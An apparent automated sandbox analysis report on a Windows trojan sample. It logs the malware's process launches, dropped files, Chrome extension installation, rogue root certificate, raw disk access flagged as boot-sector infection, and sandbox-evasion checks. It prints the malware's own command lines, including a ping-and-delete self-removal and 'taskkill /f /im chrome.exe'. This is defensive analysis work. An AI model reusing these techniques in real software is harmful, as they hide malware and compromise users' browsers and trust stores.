Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CF809D2679ADCE8E1511069275F0596C C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Roaming\1618257864703.exe 'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Roaming\1618257864703.exe 'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static file information: File size 4255416 > 1048576

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Jump to behavior

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1618257864703.exe, 0000000B.00000000.375331219.000000000040F000.00000002.00020000.sdmp, 1618257864703.exe.6.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.6.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.6.dr
Source:	Binary string: atl71.pdb source: atl71.dll.6.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.6.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.6.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.6.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000015.00000000.408882795.000000000001C000.00000002.00020000.sdmp, ThunderFW.exe.6.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.6.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.6.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI429C.tmp.3.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408D68

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403E2C push edx; ret	0_2_0040411C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00404042 push edx; ret	0_2_0040411C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004040D9 push edx; ret	0_2_0040411C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004038A0 push eax; ret	0_2_004038CE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403FA9 push edx; ret	0_2_0040411C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100105D9 push ecx; ret	0_2_100105EC
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100105D9 push ecx; ret	6_2_100105EC
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040E2F1 push ecx; ret	11_2_0040E301
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040E340 push eax; ret	11_2_0040E354
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040E340 push eax; ret	11_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00013FB5 push ecx; ret	21_2_00013FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d	0_2_1001D840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d	0_2_1001DAD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	0_2_1001D3D0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d	6_2_1001D840
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	6_2_1001DAD0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	6_2_1001D3D0

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_user.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Roaming\1618257864703.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI429C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\background.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\book.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\jquery-1.8.3.min.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\manifest.json	Jump to behavior

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d	0_2_1001D840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d	0_2_1001DAD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	0_2_1001D3D0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d	6_2_1001D840
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	6_2_1001DAD0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	6_2_1001D3D0

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

11_2_0040C41D

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10020600		0_2_10020600
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10020600		6_2_10020600

Uses ping.exe to sleep

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

0_2_100197E0

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10020600		6_2_10020600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10020600		0_2_10020600

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe TID: 6504	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 6760	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 6892	Thread sleep time: -270000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h		0_2_10022710
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h		6_2_10022710

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,		0_2_1001A1D0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001A1D0 FindFirstFileA,FindClose,		6_2_1001A1D0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.389162844.0000000003E81000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display 